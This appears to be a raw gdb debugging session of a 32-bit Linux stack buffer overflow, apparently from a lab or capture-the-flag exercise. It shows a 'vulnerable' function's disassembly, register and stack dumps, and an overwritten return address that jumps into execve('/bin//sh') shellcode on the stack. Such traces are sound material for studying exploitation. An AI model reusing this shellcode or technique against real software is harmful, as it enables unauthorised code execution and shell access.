

0xfffee868:     0x00000000      0x00000000      0xffffc578      0x00000730
0xfffee878:     0x0807f559      0x08079bec      0x00000000      0x080ea000
0xfffee888:     0xfffee8a8      0x08049d98      0xffffc876      0x00000000

   0x08049d18 <+19>:    add    $0xa02e8,%eax
   0x08049d1d <+24>:    sub    $0x4,%esp
   0x08049d20 <+27>:    push   $0x808
   0x08049d25 <+32>:    pushl  0x8(%ebp)
   0x08049d28 <+35>:    lea    -0x810(%ebp),%edx
   0x08049d2e <+41>:    push   %edx
=> 0x08049d2f <+42>:    mov    %eax,%ebx
   0x08049d31 <+44>:    call   0x80490a0
   0x08049d36 <+49>:    add    $0x10,%esp
   0x08049d39 <+52>:    mov    -0xc(%ebp),%eax
   0x08049d3c <+55>:    mov    -0x10(%ebp),%edx
   0x08049d3f <+58>:    mov    %edx,(%eax)
   0x08049d41 <+60>:    nop
   0x08049d42 <+61>:    mov    -0x4(%ebp),%ebx
   0x08049d45 <+64>:    leave  
   0x08049d46 <+65>:    ret   

(gdb) i r
eax            0x80ea000           135176192
ecx            0x80ec840           135186496
edx            0xfffee078          -73608
ebx            0x80ea000           135176192
esp            0xfffee060          0xfffee060
ebp            0xfffee888          0xfffee888
esi            0xffffc590          -14960
edi            0x80ea000           135176192
eip            0x8049d2f           0x8049d2f <vulnerable+42>
eflags         0x10296             [ PF AF SF IF RF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x63                99

   0x08049d45 <+64>:    leave  
=> 0x08049d46 <+65>:    ret    

0xfffee88c:     0xfffee07a      0xffffc877      0x00000000      0x00000000
0xfffee89c:     0x08049d57      0x00000000      0x080ea000      0xffffc578

(gdb) x/16i $ebp -2096
   0xfffee078:  push   $0xb
   0xfffee07a:  pop    %eax
=> 0xfffee07b:  cltd   
   0xfffee07c:  push   %edx
   0xfffee07d:  push   $0x68732f2f
   0xfffee082:  push   $0x6e69622f
   0xfffee087:  mov    %esp,%ebx
   0xfffee089:  push   %edx
   0xfffee08a:  push   %ebx
   0xfffee08b:  mov    %esp,%ecx
   0xfffee08d:  int    $0x80
   0xfffee08f:  popa   
   0xfffee090:  popa   
   0xfffee091:  popa   
   0xfffee092:  popa   
   0xfffee093:  popa   



